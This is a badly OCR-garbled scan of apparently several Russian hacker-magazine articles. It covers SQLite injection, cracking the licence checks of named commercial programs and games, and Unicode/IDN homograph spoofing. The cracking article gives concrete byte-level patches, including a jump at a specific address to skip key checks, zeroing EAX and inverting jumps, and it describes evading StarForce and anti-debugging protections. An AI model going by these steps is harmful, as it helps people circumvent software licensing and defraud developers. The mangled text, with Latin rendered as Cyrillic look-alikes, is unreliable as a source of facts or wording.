ет, ошибка выполнения: 

ЗЕЬЕСТ ЬОАБ_ЕХТЕЕЗІСЖ( 

’ /ІіІе/ЫтаЬ/сіоез/поЬ/ехізЬз 1 ) ; 



будет такой: 

Еггог: Тке зресіііесі тосіиіе соиісі 
поЬ Ье ІоипсЗ. 

А если файл существует, то в случае ѴѴіп- 
машины ошибка будет либо: 

Еггог: Тке зресіііесі ргосесіиге 
соиісі поЬ Ье ІоипЬ. 

Либо, если файл не является исполняемым: 

Еггог: %1 із поЬ а ѵаІіЬ 1л[іп32 
аррІісаЬіоп. 

Правда не все так хорошо, как кажется на 
первый взгляд, при сборке эту функцию 
могут отключить и испортить весь праздник 
нашедшему инъекцию. Но, как бы то ни было, 
лучше иметь в рукаве такую функцию, чем не 
иметь ее. 

ЗАКЛЮЧЕНИЕ 

На этом предлагаю окончить первое зна- 
комство с легкой базой. Выражаю надежду, 
что материал был полезен. Призываю всех 
заинтересовавшихся продолжить мои ис- 
следования и пополнить список приемов 
и техник, а также просто веб-приложений, 
которые работают на 50Ы1:е. Также замечу, 
что распространенность описанной базы 
ежегодно растет, порой приложения, исполь- 
зующие БОЫіе, можно обнаружить в самых 
неожиданных местах. Как всегда, на вопросы 
отвечаю в блоге охоб.ги т 
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ОТЛАДКА 
ѴЗ ЗАЩИТА 

Простые способы сложной отладки 




Сегодня я предлагаю познакомиться с некоторыми непростыми видами защитных механизмов, 
их описанием, примерами реализации и оценкой. И начнем мы с самых простых реализаций, 
которые ломаются в один заход и один байтом, а закончим хардкорными сооружениями 
в стиле ЗІагРогсе Ргоіесііоп Зузіеш, над взломом которых надо много думать. Итак, поехали! 



КЛАССИКА 

Самое удивительное (и к некоторому сожа- 
лению — разочаровывающее], что довольно 
много программистов предпочитают идти по 
пути наименьшего сопротивления и меньших 
затрат! Наивно полагать, что если механизм 
защиты в программе состоит из примерно 
таких программных строк: 

ІГ ЕпСег_ІІзег_кеу = Кеа1_Ргодгашш_ 
Кеу Ытеп 

Саіі КедізСгаСіоп_8иссезз (ЕпСег_ 

ІІзег_кеу ) 

еізе 

МеззадеВох . ЗЬом ( "Шгопд КЕУ ! " ) 
епсЗ. Іі 

то можно на 100% рассчитывать, что абсо- 
лютно все пользователи добросовестно и 
бескорыстно будут покупать у Вас активаци- 
онный ключ. Это очевидная глупость, но есть 
много збагеѵѵаге-приложений с подобным 
кодом и они продолжают выходить из под 



программистского пера! Отличительной чер- 
той такой простой реализации собственно и 
является упомянутое выше выделенное усло- 
вие и отсутствие каких-либо других «защит- 
ных стенок». 

В качестве примера возьмем уже затертый до 
дыр Тоіаі Ѵібео Сопѵеііег 3.12. Как показано на 
рисунке, сначала идет проверка самого ключа 
(дикое количество СМР, ЛЧР и остаток всей 
функции выше], затем (после того как бедный 
ключ прошел проверку], вызывается функция 
для успешной регистрации (опОк]. Очевидно, 
что так как все неправильные ключи ведут в АРІ 
МеззадеВохА, то первое, что приходит в голову 
(но можно сделать и по другому — как тебе 
нравится] — поставить в начало МеззадеВох (по 
адресу 421 51 С] безусловный переход на функ- 
цию успешной регистрации (ЭМР 421508]. Все! 
Регистрация проходит без участия разработчи- 
ков и самым быстрым способом :). 

Ах, да! При каждом запуске будет вылезать 
окошко с требованием ввести ключ и каждый 
раз он все-таки будет восприниматься, но ведь 



мы хотим чтоб все было стопроцентно зареги- 
стрировано! В таком случае, либо купи софту 
разработчика (ведь, по сути, ломать программы 
нехорошо, а я только указал на плохую реали- 
зацию защиты], либо напиши свой генератор 
ключей (а какой генерируется — видно из про- 
граммы!]. Еще один способ сводится к патчингу 
очередного перехода защиты, который просто 
сохраняет введенный ключ в реестре, а затем 
в самом начале, после его извлечения, срав- 
нивает. Какие можно сделать выводы? Главный 
плюс — чрезвычайно простая реализация, 
которую может исполнить любой начинающий 
программист! И в тоже время значительно 
более громадный минус — такой защитный 
механизм (если это еще можно назвать защит- 
ным механизмом!) может сломать абсолютно 
любой начинающий хакер! Поэтому в скором 
времени оказывается, «Тгіаі» эта программа 
или «Ргее» — разницы нет. Стоит ли при такой 
тривиальной реализации защитного модуля 
говорить о больших прибылях от продаж про- 
граммы? Очевидно, нет. 



► 052 
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Проверка, регистрация и ругательное сообщение(а как же 
без него). Типичный набор поместился в одном окне. 



кеу І5 Ъсд ( 



54*і 1м «ІІБ1С 
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КОГДА РАЗРАБОТЧИКИ 
ХОРОШО ДУМАЮТ... 

Самое главное — думают они сами, что и является кри- 
терием среднестатистической защиты. Вот основные 
«защитные стены» и «рвы», которые они воздвигают про- 
тив злостных хакеров: 

• средний размер защитного механизма (некоторые 
элементы антиотладки, неявные вызовы функций, множе- 
ственные вызовы функций в теле защитного механизма) и 
его клоны в разных частях программы; 

• вызов проверки (Тгіаі-времени, сверки ключа) более 
одного раза и из разных частей программы; 

• переплетение защитного механизма с рабочей частью 
программы; 

• замусоривание защитного механизма для усложнения 
исследования; как вариант: использование подложных 
(фейковых) защитных функций. 

Возможно, что программисты решат упаковать испол- 
няемый файл для уменьшения его размера. Чаще всего 
в этой роли выступает ІІРХ. Также стоит отметить, что 
кроме основного исполняемого файла, зона ответствен- 
ности защитного механизма может распространяться и на 
сІІГки самой программы. 

Здесь придется затратить больше времени, чем с про- 
граммной, описанной выше. И придется немного пора- 
ботать головой также хорошо, как и разработчикам. 
Впрочем, и удовольствия от снятой защиты будет гораздо 
больше. Ярким примером среднего уровня сложности 
взлома является НОТипеРго 3.50. Тут программеры не 
промах: наг-окошко и функция инициализации жестких 
дисков оказывается неразлучными друзьями, да и запод- 
лянок немного наставили в стиле — первично пропат- 
ченая нами прога будет работать ровно 1 минуту. Также 
учли, что после 15 дней триал-периода даже повторная 
переустановка софта не прибавит халявных дней пользо- 
вания. Мы понимаем, что придется пропатчить полдесят- 
ка условных переходов (точнее перед первым переходом 
в цикле с постусловием заменить число 12 на число, 
большее чем 16, нам ведь не нужен наг?!; второй инвер- 
тируется, где расположена проверка на прошедшую мину- 
ту, по сути там кусок основного защитного механизма. 
Остальные фишки по мелочи — например, оказалось, что 
прога вполне работоспособна и без обращений к реестру) 
и зарегистрировать программу можно банальным обнуле- 
нием регистра ЕАХ (потому, что 15-0=15). Все! Мы опять 
зарегистрировали программу без помощи разработчиков! 
Сюда можно также отнести софтину ѵѵогІсМатоиз СпСЗ: 
ТіЬегіит ѴѴагз от Еіесітопіс Агіз (игрушка требует диск). 
Повинуясь традициям, идем в папку с игрой и грузим 
первый попавшийся ехе-файл, который мирно покоитсяв 
в корне папки с игрой. Убеждаемся, что упаковщиков 



нет! А вот при запуске в Оле мы получаем сообщение, 
что какой-то там Весите Мобе Еаііесі (по-русски, софт 
просит выгрузить отладчик!). Но самое интересное: даже 
если просто запустить Олю и стартануть игру без нее, 
сообщение вылезет вновь! Вот это да! Выходит, ребята из 
Еіесітопіс Агіз считают, что всякий просто запущенный в 
системе дебаггер (независимо, что мы там отлаживаем 
или только собираемся отлаживать) может развязать 
Четвертую тибериумную войну и поэтому должен быть 
немедленно выгружен! Впрочем, после окончания иссле- 
дования спсЗ.ехе мы понимаем, что после беЮгіѵеТуреА, 
не может быть инструкции СМР ЕАХ, 5, потому что ЕАХ 
после этой АРІ будет превращен в ноль или единицу. 
Антиотладчного механизма в программе в упор не видно. 
Создается впечатление, что нас разводят. А где настоя- 
щий защитный механизм? Смотрим в диспетчере задач, 
а там «висит» спсЗдате.баІ. Теперь понятно, почему игра 
палит любой запущенный в системе дебаггер! Дочерний 
процесс (судя по всему) не знает, какой процесс будет 
(или уже отлаживается) в дебаггере, поэтому у него есть 
только догадки, что отлаживаемый процесс — спсЗ.ехе! 

Ну а дальше Четвертая тибериумная война будет останов- 
лена или продолжена уже в самом спсЗдате.баІ (кото- 
рый находится в папке с игрой\РеІаіІЕхе\[версия игры]\ 
спсЗдате.баі]... Ах, да! Наш дебаггер палится через 
ІзБебиддегРгезепІ и флаг трассировки (впрочем, послед- 
нее неактуально). Единственная программа, которую я 
видел на данный момент и которая (подчеркиваю: на пер- 
вый взгляд!) максимально укладывается в рамки идеаль- 
ного защитного механизма средней степени — ВІиеВоІеіІ 
от ІѴТ Согрогаііоп. 

Из основных особенностей стоит отметить: 

• создание в общей сложности 12(!) потоков при рабо- 
те (ребята не понаслышке знают о многопроцессорных 
системах). Неплохо! Попробуй-ка разберись в каком пото- 
ке (или даже потоках) плывет защитный механизм. 

• использование АРІ БоасІВітіпд для загрузки строковых 
сообщений, неплохо усложнит нам навигацию — теперь 
сразу выйти на нужное место защитного механизма не 
получится, открытые строки будут только после БоасІБітіпд 
со своим персональным идентификатором в стеке. 
Большой плюс в защите! 

• присутствие ІзОеЬиддегРгезепІ и ОиІрисЮеЬидВігіпд. 
Может анти отладка и есть, но какого нибудь движения в 
свою сторону я не обнаружил. Ну и ладно! Я не мешаю ей, 
она — мне. 

• за вывод информации о пятимегабайтном лимите и 
Еѵаіиаііоп версии в разных частях программы (иконка, 
окно АЬоиі),а также регистрацию лицензионного ключа 
отвечают разные функции... И это очень правильно! 







> ѵѵагпіпд 

Вся информация, 
представлена 
в данной статье 
абсолютно 
и исключительно 
для ознакомления! 
Программисты 
упомянутых 
в статье программ 
должны немедленно 
исправить все 
найденные бреши 
в своих продуктах, 
а впредь относиться 
намного более 
внимательно 
ко всему защитному 
механизму. Все 
информация или 
любая ее часть 
не может быть 
официально 
использована 
в незаконных 
целях. Автор не 
несет никакой 
ответственности 
за применение 
действий, описанных 
в статье, которые 
влекут 

за собой уголовную 
ответственность. 
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ключа можно писать а&солют^го все, что придет в здравом и не 
м рассудке или вообще ничего не писать, кому как нравится — 
будет зарегистрирована! 
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НОТипеРго_ЕІ.Р есііііоп ничем не отличается от обычной версии. 
Разве что регистрация была эльфовская) 



Но при углубленном исследовании мой 
зоркий глаз заметил, что все связанное с 
регистрацией и Еѵаіиабоп версией экспор- 
тируется из ВзЭОК.сШ (отмечу, что по имени 
функции можно прочитать, что она делает. 

Это касается и защитного механизма, что 
сразу бросится в глаза], в которой все функ- 
ции, отвечающие за вывод сообщений об 
Еѵаіиабоп версии и пятимегабайтном лимите, 
имеют под собой основу в одну единственную 
общую ключевую функцию, которая, в заре- 
гистрированной версии, должна возвратить в 
регистре ЕАХ бублик! Правда еще надо будет 
«подправить» переход, когда вводится ключ 
и ловится он на МеззадеВохА. Ну, а под зана- 
вес хотел добавить, что просто так выгрузить 
процессы программы не получится — прои- 
зойдет необработанное исключение в специ- 
ально установленном драйвере программы. 
Как результат — после завершенного процес- 
са считаем белые буквы на синем фоне :]. 

Как видно, защитные механизмы среднего 
типа, при должном приложении сил защища- 
ют неплохо, хотя при наличии опыта и головы 
все равно будут сняты. Но ведь не за десять 



же секунд как в ТѴС! Плюс такого подхода: 
даже при тесном переплетении и довольно 
нелегкой реализации будет минимальная 
глючность, ведь сами разработчики про- 
граммы учтут все тонкости ее работы. Минус: 
агрессивных методик противодействия 
взломщику нет. Ничто не мешает по пере- 
крестным ссылкам добраться до защитного 
механизма (неприменимо к ВІиеЭоІеіІ], а 
дальше — дело чисто техническое. 

КОГДА РАЗРАБОТЧИКИ ПРЕДПОЧИТАЮТ 
ДУМАТЬ ЧУЖОЙ ГОЛОВОЙ... 

Здесь имеется ввиду приобретение и уста- 
новка на программный продукт готовых про- 
граммных и аппаратных реализаций защиты. 
Весьма условно сложные типы (в данном 
контексте будем называть их так] защитных 
механизмов можно разделить на протек- 
торы (например, АЗРгоТесТ] и программно- 
аппаратные защитные комплексы. Последние 
делятся собственно на программные и аппа- 
ратные. Если смотреть на все это дело трез- 
во, то все это выглядит как Большой черный 
замок, висящий на картонной двери дома, 



ром сидит радо 
свято верует в создателей замка, а также 
думает, что он на 100% защищен от всех и 
вся, забыв к тому же закрыть окна. В конце 
концов, если эту дверь вместе с домом не 
завалит тяжелый замок, то хакеры ее гаран- 
тированно снесут или же найдут обходной 
путь. Надеюсь, основная мысль понятна. 
Теперь перенесу теорию на практику и при- 
меню ее к протекторам. Фундаментальная 
задача этого программного творения — не 
допустить просмотра и патчинга дизас- 
семблированного листинга защищаемой 
программы. Обеспечивается все это анти- 
отладочной защитой и многослойным шиф- 
рованием, а последний рубеж — помехи в 
работоспособности снятого дампа (например, 
подлянки в стиле кражи байт с ОЕР). 

В качестве примера берем Резой гсеВиіІсІег. 
Исполняемый файл и две дочерних сЛГки 
защищены АЭРгоІесЕ Посмотри на приведен- 
ный рисунок и попробуй ответить на вопрос 
— обязательно ли нужно для регистрации 
программы бегать по всему образу в поисках 
ОЕР, снимать дамп и возиться с ним? 

С защитными комплексами больше интимной 
лирики по отношению ктвоим мозгам. 
Большими защитными комплексами зани- 
маются большие компании (коих, кстати, 
немало], они день и ночь занимаются тем, 
что придумывают новые гадости для хакеров, 
дабы максимально обезопасить защищае- 
мое приложение. Очень часто результат их 
дум получается с противоположным знаком. 
Если территория «боевых действий» про- 
тектора в основном не выходит за целевой 
образ защищаемого исполняемого файла, 
то создатели защитных комплексов пред- 
почитают распространять свои правила на 
всю систему, не поинтересовавшись при 
этом ничьим мнением и не спросив твоего 
разрешения. С одной стороны их продукты 
частично дают хороший результат в защите, 
но по поводу обратной стороны медали тут 
хранят молчание! Где ты видел, к примеру, 
чтоб в рекламе ЭФгЕогсе внизу маленькими 
буквами говорилось (хотя бы так): наш про- 
дукт имеет ошибки, поэтому стабильность в 
работе не гарантируется? Также не обижайся, 
что несколько упадет производительность. В 
Мануэле данной защиты этот аспект отражен 
вообще как анекдот: чтобы убедиться в отсут- 
ствии потери производительности, необходи- 
мо просто протестировать скорость Вашего 
жесткого диска до установки драйвера и 
после («выкрутились», называется). 

Поэтому и получается, что синий экран, 
постоянно вылетающий у Славы — проблемы 
самого Славика, а не программистов из ком- 
пании ЭіагЕогсе, ну и тем более это не про- 
блемы МелкоСофта. А то Славик взял у друга 
новую игрушку, дык мало, что игрушка сама 
с тонной багов (кстати, на одном баге можно 
выехать при снятии дампа], тут еще пробле- 
мы самой защиты. Да и вообще Славик взял 
игрушку, а все что взял, рано или поздно 
надо отдавать, а поиграть хочется! Поэтому 
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Попытка устроить Четвертую 
тибериумную войну. Видимо нас 
разводят! 



приходится Славику сначала брать ЗоШсе, 
но чтоб запхнуть защиту в холодильник, при- 
дется обработать ее драйвер йодом (в смысле 
Идой) :). 

Вобщем, хорошего очень и очень мало, 
поэтому получается, что сами разработчики 
защитного комплекса частично вынуждают 
пользователя объявить защите бойкот и 
взяться за дебаггер! 

Даже если бы Славик спросил, не могли бы 
программисты этой самой игры написать 
свой защитный механизм (каку Еіесіхопіс 
АгЫ — последовал бы ответ в стиле: нам 
еще надо движок самой игры отладить и смо- 
делировать нового суперпупермонстра в Зсіз 
Зіисііо Мах! А успеть до даты релиза ой, как 
хочется. Блин! Пристают тут всякие, мешают 
работать, о какой дате релиза может идти 
речь... К слову, таких программистов понять 
отчасти можно, самое главное — сделать 
игрушку конфеткой. Так что использование 
коробочных решений в чем-то оправдано. 

В отладочном микроскопе такие защиты 
какЗіагРогсе представляются громадными 
и неповоротливыми осьминогами, рас- 
кинувшими свои щупальца по системным 
библиотекам, некоторым файлам игры ну и, 
возможно, часть щупалец лежит на нулевом 
кольце системы (а вы что хотели? надо же 
беззаботного пользователя баловать синими 
экранами). Невооруженным глазом мы лишь 
видим, как процессорные мощности считают 
какую-то геометрию диска — лучше было бы, 
если эти самые мощности в данный момент 
обрабатывали данные самой защищаемой 
программы. Сплошная деоптимизация! 

Самое худшее, что есть еще более страшные 
вещи: 

У меня более пяти раз «падал» том жесткого 
диска! Исходя из этого, лишь подтверждаю 
утверждение Криса Касперски — не уста- 
навливай ничего недокументированного или 
плохо документированного. В большинстве 
случаев это не даст ничего хорошего и полез- 
ного! Ты же видишь, что защита устанавливает 
какой-то специальный драйвер, но не знаешь 
точно, как этот драйвер куролесит в операци- 
онной системе. Особенно это заметно, когда 
аррбгѵгет.ехе в ІбаРго и видишь зашифрован- 
ный ассемблерный код. 

ЗаІеОізк в этом отношении намного более 
«благороден» к хакерам. Если создатели 
БіагРогсе ждут, пока реверсера стошнит от 
бесконечного мусорного кода, то некото- 
рое исключение составляет За^еОізк 4.x с 
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Фирменная функция проверки ІеОеЬиддегРгееепІ? может 
превратиться в ІзбеЬиддегАЬзепН 



его «лягушкой» (свои люди поймут), одна 
из функций которой — возвратить 426 при 
активной отладке приложения и 416 — если 
отладчика нет. Диковинка подхода к реали- 
зации защиты — один из важных козырей ее 
разработчика. Важно сохранить этот аспект и 
в новых версиях защиты! 

Подведем итог. Специальные комплексы 
(коробочные решения) защит по своей сути 
средства действительно мощные и сложно- 
сочиненные. Но есть несколько неприятных 
обстоятельств. 

- при такой сложности они тащат 
за собой вагон багов, проблем и 
иногда даже серьезных уязвимостей; 

- очень мало пользователей, кото- 
рым нравится вставлять /вынимать 
каждый раз диск и вообще иметь 
хоть какое-то дело с графической 
частью защиты; 

- серьезно страдает производитель- 
ность и стабильность системы в 
целом; 

- если сломали одну версию такой 
защиты, то паровоз поедет и 
дальше ! Под этим понимаются две 
основных проблемы новых вер- 
сий сложных защитных комплексов : 
отсутствие чего-то фундаменталь- 
но нового для защиты и излишняя 
ненужная сложность , которая не 
несет в себе полезных качеств . 

В ЗбагРогсе единственное громад- 
ное изменение — это количество 
«мусора», его становится больше 
(казалось, куда еще, видимо сло- 
восочетание «в разумных пределах» 
вообще никак не применимо к раз- 
работчикам) , незначительно мути- 
руют (видоизменяются) ключевые 
функции защиты и добавляется пара 
новых бяк, которые легко обнару- 
жить (например, в последней версии 
ргобесб.сШ — «охота» на ОІІуБЬд) . 
Отсюда мораль: разработчикам абсо- 



лютно лень переделывать все заново 
(или хотя бы большую часть) и в 
каждой новой версии ее внутрен- 
ности меняются незначительно . 

Ведь даже если в последних вер- 
сиях ргобесб . 611 море мусора, мы 
ведь знаем что ищем, если до того 
терзали более старые версии, где 
мусора намного меньше. 

Описание: Звездное командо- 
вание имеет свою собственную 
КеВидСПескЕх, которая призвана 
остановить любопытных хакеров при 
исследовании защиты 

И ЭТО ДАЛЕКО НЕ ВСЕ... 

Как видите, дорогие читатели (особен- 
но программисты), идеальных защитных 
механизмов не существует! Факт! Или 
разработчики уделили внимание одним 
аспектам, но оставили без внимания 
другие немаловажные или вообще не уде- 
лили никакого внимания к защите своего 
детища. Лично мой выбор — это средний 
тип защитного механизма. Сравнивая 
его с двумя остальными, получим сле- 
дующую картину: защитный механизм, 
длина которого во много раз более чем 
один условный переход по праву может 
называться защитным механизмом. Для 
хорошей реализации понадобится много 
времени, но сломать его сразу в один байт 
уже не получится. Протектор — настоящая 
русская рулетка! Никогда не будет 100% 
уверенности, что на всех компьютерах 
защищаемое приложение будет работать 
корректно или вообще работать хоть как- 
то. Программно-аппаратные защитные 
комплексы — крайне опасный перегиб 
палки. За свой век они уже успели найти 
достаточно противников и их интеграция в 
свой продукт не приветствуется. Наконец 
самый весомый аргумент: все коробоч- 
ные решения давно уже взломаны и в 
интернете предостаточно статей, которыми 
могут руководствоваться даже начинаю- 
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Звездное командование имеет свою собственную КеВидСМеск- 
Ех, которая призвана остановить любопытных хакеров при 
исследовании защиты 



Свято веруя, что р 
не доберутся до за 
механизма, разработ чики Ке- 
зоигсеВиіШег решили не тратить 
своих сил. Поэтому вся логика 
работы свелась в присутствии 
нужных байт в файле с 
недвусмысленным названием 
гедкеу.Ьіп. Последний должен 
присутствовать в корневой 
директории программы. 
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ВІиеБоІеіІ собственной эльфовской персоной. 



щие хакеры. Поэтому, если взялись за это 
дело, не упустите все аспекты, упомяну- 
тые в статье. Рекомендую самим взяться 



за отладчик и взломать свою же защиту, 
затем при необходимости ее доработать. 
Под конец подумай — реально ли требует- 



ся защищать твое приложение на данном 
этапе? Нехитрая формула показывает, за 
какое время может быть сломлена Ваша 
защита: 

[Время затраченное на взлом защи- 
ты] = [Уровень защищенности и 
стойкость самой защиты] * [Новизна 
используемых методов] / [Уровень 
взломщика ( начинающий , продвинутый , 
гуру) ] * [Распространенность Вашей 

программы] ) * [Количество взлом- 

щиков] 

Средний тип защиты — это Ваша креатив- 
ность и гарантия работы программы у конеч- 
ного пользователя. Ведь если я знаю все 
тонкости своей программы и она работает 
без глюков (хотя насчет ТіЬегіит ѴѴагз с его 
недружелюбностью к запущенному дебаггеру 
надо помнить, Четвертая тибериумная война 
— не шутки], что мне помешает посидеть еще 
пару часов и грамотно раскидать защитный 
модуль? 

В итоге остаются довольны все: разработчик 
(в получении большей части заветной при- 
были], конечный пользователь (в дружелюб- 
ности защиты по отношению к нему], ну и, в 
конце концов — хакеры. ..□с 



ІзОеЬиддегРгезепІ? в самых последних версиях защиты. 
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Думаю, ты не раз встречал эксплойты, которые классифицируются как ІІпісосІе, подыскивал 
нужную кодировку для отображения страницы, радовался очередным кракозябрам то тут, 
то там. Да мало ли чего еще! Если ты хочешь узнать, кто заварил всю эту кашу, и расхлебывает 
по сей день, пристегни ремни и читай дальше. 



К ак говорится, — «инициатива нака- 
зуема» и, как всегда, виноваты во 
всем оказались американцы. 

А дело было так. На заре рас- 
цвета компьютерной индустрии 
и распространения интернета появилась 
необходимость в универсальной системе 
представления символов. И в 60 годах про- 
шлого века появляется А5СІІ — «Атегісап 
5іапсІагсІ Собе іюг Ігбогтабоп Іпіегсбапде» 
(Американский Стандартный Код для Обмена 
Информацией], знакомая нам 7-битная 



кодировка символов. Последний восьмой 
неиспользованный бит был оставлен как 
управляющий бит для настройки А5СІІ- 
таблицы под свои нужды каждого заказчика 
компьютера отдельного региона. Такой бит 
позволял расширить АБСІІ-таблицу для 
использования своих символов каждого 
языка. Компьютеры поставлялись во мно- 
гие страны, где уже и использовали свою, 
модифицированную таблицу. Но позже такая 
фича переросла в головную боль, так как 
обмен данными между ЭВМ стал достаточно 



проблематичным. Новые 8-битные кодовые 
страницы были несовместимы между собой 
— один и тот же код мог означать несколь- 
ко разных символов. Для разрешения этой 
проблемы 150 («Іпіюгпабопаі Огдапігабоп 
бог Збапсіагсіігаіііоп», Международная 
Организация по Стандартизации] предложи- 
ла новую таблицу, а именно — «150 8859». 
Позже этот стандарт переименовали в 1105 
(«Ібпіѵегзаі СЬагасІег 5е1», Универсальный 
Набор Символов]. Однако, к моменту первого 
выпуска ІЭС5 появился ІІпісосІе. Но так как 
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цели и задачи обоих стандартов совпадали, было приня- 
то решение объединить усилия. Что ж, Ібпісобе взял на 
себя нелегкую задачу — дать каждому символу уникаль- 
ное обозначение. На данный момент последняя версия 
ІІпісосІе — 5.2. 

Хочу предупредить — на самом-то деле история с коди- 
ровками весьма мутная. Разные источники предоставляют 
разные факты, так что не стоит зацикливаться на одном, 
достаточно быть в курсе того, как все образовывалось и 
следовать современным стандартам. Мы ведь, надеюсь, 
не историки. 

КРАШ-КУРС ІЖІСООЕ 

Прежде чем углубляться в тему, хотелось бы пояснить, что 
представляет собой ЦІ п ісосіе в техническом плане. Цели 
данного стандарта мы уже знаем, осталось лишь матчасть 
подлатать. 

Итак, что есть Ібпісобе? Проще говоря — это способ пред- 
ставить любой символ в виде определенного кода для 
всех языков мира. Последняя версия стандарта вмещает 
порядка 1 100 000 кодов, которые занимают пространство 
от 11+0000 до ІІ+10РРРР. Но тут будь внимателен! ІІпісосІе 
строго определяет то, что есть код для символа и то, как 
этот код будет представлен в памяти. Коды символов 
(допустим, 0041 для символа «А») не имеют какого- 
либо значения, а вот для представления этих кодов 
байтами есть своя логика, этим занимаются кодировки. 
Консорциум И п ісосіе предлагает следующие виды коди- 
ровок, называемые ІІТР (ІІпісосІе Тгапзіюгтабоп Рогтаіз, 
«Форматы Преобразования ІІпісосІе»]. А вот и они: 

ІІТР -7 : данную кодировку не рекомендуется 
использовать из соображений безопасности и 
совместимости. Описана в КРС 2152. Не явля- 
ется частью ІІпісосІе, однако была представ- 
лена данным консорциумом. 

ІІТР- 8: самая распространенная кодировка 
в веб-пространстве. Является переменной, 
шириной от 1 до 4 байт . Обратно совместима 
со протоколами и программами, использую- 
щими А8СІІ. Занимает пределы от 11+0000 до 
ІІ+007Р . 

БТР-16: использует переменную ширину от 2 
до 4 байт. Чаще всего встречается примене- 
ние 2 байт. ІІСЗ-2 является этой же кодиров- 
кой, только с фиксированной шириной 2 байта 
и ограничено пределами ВМР . 

ІІТР-32: использует фиксированную ширину в 4 
байта, то есть 32 бита. Однако используется 
только 21 бит, остальные 11 забиты нулями. 
Пусть данная кодировка и громоздка в плане 
пространства, но считается наиболее эффек- 
тивной по быстродействию за счет 32 -бит- 



Кусок из стандарта, поясняющий разницу форм 
нормализаций 



РІШѴССЮЕ - КОСТЫЛЕК 
СОВМЕСТИМОСТИ. 

БЫЗ не позволяет использовать какие-либо иные символы кроме латиницы, 
цифр и дефиса в названиях доменов, для 0145 используется «урезанная» 
АЭСІІ-таблица. 

Поэтому, ради обратной совместимости, приходится такой многоязычный 
ІІпісобе-домен преобразовывать в старый формат. Эту задачу на себя берет 
браузер пользователя. После преобразований домен превращается в набор 
символов с префиксом «хп— » или как его еще называют — «Рипусобе». К 
примеру, домен «хакер. ш» после преобразования в Рипусобе выглядит так: 
«хп--80ако2ѵ.ги». Больше по Рипусобе читай в РРС 3492. 

і 



ной адресации в современных компьютерах. 
Ближайший аналог ІІТР-32 — кодировка ІІСЗ-4, 
но сегодня используется реже . 

Несмотря на то, что в ІЯР-8 и ІЯР-32 можно пред- 
ставить чуть больше двух миллиардов символов, было 
принято решение ограничиться миллионом с хвостиком 
— ради совместимости с ІЯР-16. Все пространство кодов 
сгруппировано в 17 плоскостей, где в каждой по 65536 
символов. Наиболее часто употребляемые символы рас- 
положены в нулевой, базовой плоскости. Именуется как 
ВМР — Вазіс МиІііРІапе. 

Поток данных в кодировках ІЯР-16 и ІЯР-32 может быть 
представлен двумя способами — прямым и обратным 
порядком байтов, называются ІЛР-1 6І_Е/ІЛР-32І_Е, ІЯР- 
16ВЕ/1ЯР-32ВЕ, соответственно. Как ты и догадался, 

БЕ — это ІіШе-епбіап, а ВЕ — Ьід-епбіап. Но надо как-то 
уметь различать эти порядки. Для этого используют метку 
порядка байтов ІЯРЕРР, в английском варианте — ВОМ, 
«Вуіе Огбег Мазк». Данный ВОМ может попадаться и в 
ІЯР-8, но там он ничего не значит. 

Ради обратной совместимости Юникоду пришлось вме- 
стить в себя символы существующих кодировок. Но тут 
возникает другая проблема — появляется много вариан- 
тов идентичных символов, которые как-то нужно обраба- 
тывать. Поэтому нужна так называемая «нормализация», 
после которой уже можно сравнить две строки. Всего 
существует 4 формы нормализации: 

РГогтаІігаБіоп Рогт Б (ЫРБ) : каноническая 
декомпозиция . 

БогтаІігаБіоп Рогт С (БРС) : каноническая 
декомпозиция + каноническая композиция . 
БогтаІігаБіоп Рогт КБ (БРКБ) : совместимая 

декомпозиция . 




> іпіо 

ЮІЧА- ЮЫ іп 
Арріісабопз (ЮІЧ 
в приложениях], это 
протокол, который 
решает многие 
проблемы, позволяя 
использовать много- 
язычные доменные 
имена в приложе- 
ниях. Был придуман 
организацией ІЕТЕ, 
на данный момент 
существует только 
РЕС старой версии 
ЮІЧА2003 - ВЕС 
3490. Новый стан- 
дарт несовместим 
с предыдущим. 
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Локальная Вісіі-атака 




ЫогтаІігаСіоп Рогт КС (ЫРКС) : 
совместимая декомпозиция + канони- 
ческая композиция. 

Теперь подробнее про эти странные слова. 
Юникод определяет два вида равенств 
строки — каноническая и по совместимости. 
Первое предполагает разложение сложно- 
го символа на несколько отдельных фигур, 
которые в целом образуют исходный символ. 
Второе равенство подыскивает ближайший 
подходящий по виду символ. А компози- 
ция — это объединение символов из разных 
частей, декомпозиция — обратное действие. 

В общем, глянь на рисунок, все станет на 
место. 

В целях безопасности нормализацию следует 
делать до того, как строка поступит на про- 
верку каким-либо фильтрам. После данной 



операции размер текста может меняться, что 
может иметь негативные последствия, но об 
этом чуть позже. 

В плане теории на этом все, я многое еще 
не рассказал, но надеюсь ничего важного 
не упустил. ІІпісобе невообразимо обширен, 
сложен, по нему выпускают толстые книги, и 
очень нелегко сжато, доступно и полноценно 
объяснить основы столь громоздкого стан- 
дарта. В любом случае, для более глубокого 
понимания следует пройтись по боковым 
ссылкам. Итак, когда картина с Юникодом 
стала более-менее ясна, можем ехать даль- 
ше. 

ЗРИТЕЛЬНЫЙ ОБМАН 

Наверняка ты слышал про I Р/АРР/ЮЫ5- 
спуфинг и хорошо представляешь, что это 
такое. Но есть еще так называемый «визуаль- 



ный спуфинг» — это тот самый старый метод, 
которым активно пользуются фишеры для 
обмана жертв. В таких случаях применяют 
использование схожих букв, наподобие «о» и 
«О», «5» и «в». Это наиболее распространен- 
ный и простой вариант, его и легче заметить. 
Как пример можно привести фишинг-атаку 
2000 года на РауРаІ, о которой даже упомя- 
нуто на страницах ѵѵѵѵѵѵ.ипісобе.огд . Однако к 
нашей теме Юникода это мало относится. 

Для более продвинутых ребят на горизонте 
появился ІЭпісобе, а точнее — ЮІМ, что являет- 
ся аббревиатурой от «Іпіегпабопаіігеб Оотаіп 
Ыатез» (Интернационализованные Доменные 
Имена]. ЮЫ позволяет использовать символы 
национального алфавита в доменных именах. 
Регистраторы доменных имен позиционируют 
это как удобную вещь, мол, набирай доменное 
имя на своем родном языке! Однако, удобство 
это весьма сомнительное. Нуда ладно, мар- 
кетинг — не наша тема. Зато представь, какое 
это раздолье для фишеров, сеошников, кибер- 
скво^еров и прочей нечисти. Я говорю об 
эффекте, что называется ЮІМ-спуфинг. Данная 
атака относится к категории визуального спу- 
финга, в английской литературе это еще назы- 
вают как «Ьотодгарб аКаск», то есть, атаки с 
использованием омографов (слов, одинаковых 
в написании). 

Да, при наборе букв никто не ошибется и 
не наберет заведомо ложный домен. Но 
ведь чаще всего пользователи щелкают по 
ссылкам. Если хочешь убедиться в эффек- 
тивности и простоте атаки, то посмотри на 
ка ртинку. 

